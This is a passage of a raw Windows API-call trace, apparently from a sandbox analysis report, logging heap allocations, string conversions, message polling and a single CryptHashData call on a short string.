lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0217.319] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0217.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0217.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55028, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0217.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0217.320] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0217.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0217.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51568 [0217.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51568, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0217.321] CryptHashData (hHash=0xa87050, pbData=0x2e54fa8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0217.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0217.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0217.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0217.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0217.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0217.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0217.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0217.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0217.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0217.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0217.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0217.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0217.324] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0217.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.325] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0217.325] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0217.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0217.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0217.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0217.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0217.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0217.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.327] RtlAllocateHeap 